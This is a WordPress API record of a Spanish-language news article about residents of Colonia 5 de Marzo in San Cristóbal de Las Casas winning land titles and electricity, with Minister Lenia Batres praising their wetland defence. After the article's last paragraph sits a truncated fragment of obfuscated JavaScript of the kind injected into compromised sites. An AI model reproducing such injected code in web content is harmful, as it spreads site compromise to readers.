{"id":25391,"date":"2025-11-24T02:44:34","date_gmt":"2025-11-24T02:44:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25391"},"modified":"2025-11-24T02:44:35","modified_gmt":"2025-11-24T02:44:35","slug":"colonos-de-la-5-de-marzo-guardianes-de-los-humedales-e-incansables-en-la-lucha-por-sus-derechos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25391","title":{"rendered":"Colonos de la 5 de Marzo, guardianes de los humedales e incansables en la lucha por sus derechos"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" data-id=\"25392\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453745-1024x766.jpg\" alt=\"\" class=\"wp-image-25392\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453745-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453745-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453745-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453745.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" data-id=\"25393\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453754-1024x766.jpg\" alt=\"\" class=\"wp-image-25393\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453754-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453754-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453754-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453754.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" data-id=\"25396\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453748-1024x766.jpg\" alt=\"\" class=\"wp-image-25396\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453748-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453748-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453748-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453748.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" data-id=\"25394\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453751-1024x766.jpg\" alt=\"\" class=\"wp-image-25394\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453751-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453751-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453751-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453751.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" data-id=\"25395\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453757-1024x766.jpg\" alt=\"\" class=\"wp-image-25395\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453757-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453757-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453757-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000453757.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>23 de noviembre del 2025. Los habitantes de la Colonia 5 de Marzo de San Crist\u00f3bal de Las Casas han conseguido victorias fundamentales: la regularizaci\u00f3n de sus tierras y la electrificaci\u00f3n de la comunidad, un avance que la Ministra de la Suprema Corte de Justicia de la Naci\u00f3n (SCJN), Lenia Batres, calific\u00f3 como una \u201cmuestra ejemplar\u201d en la defensa de los derechos humanos y el medio ambiente.<\/p>\n\n\n\n<p>En entrevista, la Ministra Batres destac\u00f3 la doble importancia del trabajo realizado por los 532 familias de la colonia.<\/p>\n\n\n\n<p>Por un lado, su lucha ha sido crucial para la protecci\u00f3n de los humedales de monta\u00f1a de San Crist\u00f3bal, de los cuales se ha perdido el 60%. Por otro, su organizaci\u00f3n ha sido fundamental para alcanzar derechos humanos universales.<\/p>\n\n\n\n<p>\u201cHan dado una muestra que yo creo que es ejemplar\u2026 lograron pues nada menos que se declarara \u00e1rea natural protegida, lo cual es muy importante\u201d, afirm\u00f3 Batres, resaltando la \u201cvalent\u00eda\u201d de los comit\u00e9s eco comunitarios.<\/p>\n\n\n\n<p>\u201cEst\u00e1n defendiendo derechos humanos. En este caso, adem\u00e1s, un derecho fundamental que en cualquier ciudad deber\u00eda tomarse con mucha responsabilidad\u201d.<\/p>\n\n\n\n<p>La Ministra enfatiz\u00f3 la grave crisis de sustentabilidad h\u00eddrica que enfrentan las ciudades y se\u00f1al\u00f3 que San Crist\u00f3bal deber\u00eda ser un \u201cejemplo\u201d para otras urbes en crecimiento de que \u201cest\u00e1n a tiempo de cuidar sus recursos naturales\u201d.<\/p>\n\n\n\n<p>Un camino de 31 a\u00f1os coronado con \u00e9xito<\/p>\n\n\n\n<p>La historia de esta lucha se remonta a 1992, pero tom\u00f3 un impulso decisivo en julio de 2022, cuando los residentes, representados por la presidenta del Consejo de Participaci\u00f3n y Colaboraci\u00f3n Vecinal, Carmen Guill\u00e9n M\u00e9ndez, presentaron ante el gobierno federal la petici\u00f3n para la escrituraci\u00f3n de sus tierras.<\/p>\n\n\n\n<p>El avance m\u00e1s significativo lleg\u00f3 en 2023 con la instalaci\u00f3n de una mesa de trabajo con los tres niveles de gobierno, lo que result\u00f3 en la autorizaci\u00f3n del cambio de uso de suelo, regularizando el predio.<\/p>\n\n\n\n<p>Para 2024, el proyecto tom\u00f3 forma concreta con la presentaci\u00f3n de un plan de electrificaci\u00f3n con una inversi\u00f3n federal de 5 millones 884,916.79 pesos. Finalmente, en junio de 2025, el proyecto fue aprobado y su ejecuci\u00f3n est\u00e1 programada para el periodo junio-noviembre de este a\u00f1o.<\/p>\n\n\n\n<p>El \u201cderecho a la ciudad\u201d y un llamado a las autoridades<\/p>\n\n\n\n<p>La Ministra Batres se refiri\u00f3 espec\u00edficamente al caso de la Comisi\u00f3n Federal de Electricidad (CFE) como un parteaguas. Critic\u00f3 que, durante d\u00e9cadas, la CFE y otras instituciones negaron servicios a comunidades como la 5 de Marzo bajo el argumento de ser \u201ccolonias irregulares\u201d.<\/p>\n\n\n\n<p>\u201cEn lugar de ayudar a su regularizaci\u00f3n, le niegan a la gente los servicio, se castiga much\u00edsimo. Ahora le llamamos a esto \u2018derecho a la ciudad\u2019\u201d, explic\u00f3.<\/p>\n\n\n\n<p>\u201cEs un derecho humano, no se le puede, no se le debe negar a la gente que vive en \u00e1reas conurbadas \u2018irregulares\u2019 los servicios porque es en detrimento del ejercicio de sus derechos humanos\u201d, enfatiz\u00f3.<\/p>\n\n\n\n<p>La Ministra consider\u00f3 que la disposici\u00f3n de las autoridades actuales para reconocer estos derechos fue clave para el \u00e9xito de la colonia.<\/p>\n\n\n\n<p>Subray\u00f3 que la lucha de la comunidad no solo garantiza la sustentabilidad ambiental, sino que sienta un precedente crucial para que otras autoridades repliquen este modelo en la provisi\u00f3n de servicios esenciales como el agua y la pavimentaci\u00f3n.<\/p>\n\n\n\n<p>La historia de la Colonia 5 de Marzo se erige as\u00ed como un testimonio de que la organizaci\u00f3n comunitaria persistente puede lograr la materializaci\u00f3n de derechos humanos fundamentales y la protecci\u00f3n del fr\u00e1gil ecosistema en el que habitan.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 23 de noviembre del 2025. Los habitantes de la Colonia 5 de Marzo de San Crist\u00f3bal de Las Casas han conseguido victorias fundamentales: la regularizaci\u00f3n de sus tierras y la electrificaci\u00f3n de la comunidad, un avance que la Ministra de la Suprema Corte de Justicia de la Naci\u00f3n (SCJN), Lenia Batres, calific\u00f3 como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25396,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25391","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25391"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25391\/revisions"}],"predecessor-version":[{"id":25397,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25391\/revisions\/25397"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25396"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}